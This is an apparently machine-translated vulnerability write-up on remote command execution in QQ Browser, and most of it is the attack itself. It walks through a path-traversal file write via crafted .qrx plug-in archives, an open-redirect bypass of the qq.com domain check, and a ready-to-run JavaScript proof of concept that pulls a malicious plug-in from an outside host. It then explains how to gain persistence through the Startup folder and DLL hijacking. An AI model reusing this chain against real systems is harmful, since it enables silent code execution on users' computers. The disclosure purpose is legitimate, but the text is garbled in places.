QQ Browser Remote Arbitrary Command Execution Vulnerability (with analysis and use)

QQ Browser Remote Arbitrary Command Execution Vulnerability (with analysis and use)

1. For the QQ browser, as long as it is a webpage under the domain name of qq.com, it has the permission to call some API Interfaces under external, such:

Installation plug-in: window. external. extension. installExtension

Uninstall the plug-in: window. external. getExtension (""). uninstallExtension



2. For window. external. extension. installExtension, its usage is as follows:

Window. external. extension. installExtension ("plug-in GUID", "plug-in address", "plug-in version", callback function );

One instance:
 

window.external.extension.installExtension("{CD36E3DB-304A-48EF-A8A2-D873F608D2AE}","http://xxxx.qq.com/AAAAAAAA.qrx","8.0.1.19",function(){alert("install ok");});

The plug-in address must be an address in the qq.com domain.



3. it seems that we can install any plug-in. However, the implementation of QQ's browser plug-in provides a verification mechanism for JS files called in the plug-in and other files containing functional code, this makes it impossible to package malicious JS code in the plug-in.



4. However, the QQ browser plug-in (qrx) itself is a compressed package. When installing the QQ plug-in remotely, the QQ browser will first decompress the compressed package and then verify the package in the previous step. There is no problem in verifying this step. Will there be a problem in extracting this step?



5. We downloaded a QQ browser plug-in and opened it in 7zip. We dragged a calc.exe to the compressed package,


 

Rename calc.exe:



.../Calc.exe


 

It is equivalent to packing a file in this path in the compressed package: C: \ Users \ USERNAME \ AppData \ Roaming \ Tencent \ QQBrowser \ Extensions8 \ {token} \ 8.0.0.2 \.. /.. /.. /.. /.. /.. /.. /.. /.. /calc.exe



6. Put the transformed 1. qrx file and index. php In the root directory of our local test server (x.com.



/1.qrx

/Index. php



The index. php code is:
 

<?phpecho file_get_contents("./1.qrx");?>

To bypass the domain name restriction of the plug-in URL in window. external. extension. installExtension, we found a 302 jump in the previous vulnerability of wooyun:



Http://tixing.qq.com/cgi-bin/jump? Url = http://xxx.com/



The url parameters of this jump still have domain name judgment restrictions, but we can easily use the following methods to bypass it.



Http://tixing.qq.com/cgi-bin/jump? Url = http://x.com? Qq.com/



This is also the plugin we finally constructed:



Http://tixing.qq.com/cgi-bin/jump? Url = http://x.com? Qq.com/



--> Jump:



Http://x.com? Qq.com/



--> Equivalent to http://x.com/index.php



--> Read 1. qrx returned content



7. Open a QQ website, such as qzs.qq.com/123)



Then, f12open the script console and run the test code (A calc.exe file will be written to the C root directory ):

(function(){var isWin7=/NT\s+6/.test(navigator.userAgent);window.external.getExtension("").uninstallExtension("{CD36E3DB-304A-48EF-A8A2-D873F608D2AE}",function(){if(isWin7){window.external.extension.installExtension("{CD36E3DB-304A-48EF-A8A2-D873F608D2AE}","http://tixing.qq.com/cgi-bin/jump?url=http://appmaker.sinaapp.com?.qq.com/1.qrx","8.0.1.19",function(){alert("demo win7");});}else{//xpwindow.external.extension.installExtension("{CD36E3DB-304A-48EF-A8A2-D873F608D2AE}","http://tixing.qq.com/cgi-bin/jump?url=http://appmaker.sinaapp.com?.qq.com/1.qrx","8.0.1.19",function(){alert("demo xp");});}});})();

Shows the effect:


 

You can see that (in Windows 7, UAC needs to be disabled). After the installation plug-in is called, a calc.exe file is actually written in the C root directory.



The same is true in XP.


 

8. The last thing we need to do is to find an XSS In the QQ domain. I will not find it here. Because the focus of this vulnerability is no longer on XSS .. If you have to find a replacement, leave a message.

1. In win7, when UAC is disabled, the startup directory can be written,



Rename calc.exe .. /.. /.. /.. /.. /.. /.. /.. /.. /ProgramData/Microsoft/Windows/Start Menu/Programs/Startup/calc.exe.



However, in XP, the startup directory contains Chinese characters, which cannot be properly processed during decompression.



2. However, in xp, commands can be executed based on other minor issues, such as dll hijacking.



If the QQ browser is installed by default,



Create a dll by yourself and rename it .. /.. /.. /.. /.. /.. /.. /.. /.. /Program Files/Tencent/QQBrowser/setupapi. dll



When a user accesses a malicious web page and installs a malicious plug-in package, a setupapi. dll will be released in the directory of the QQ browser. The next time the browser is started, it will be hijacked, for example:


 

 

Solution:

Fix the installation code of the plug-in package.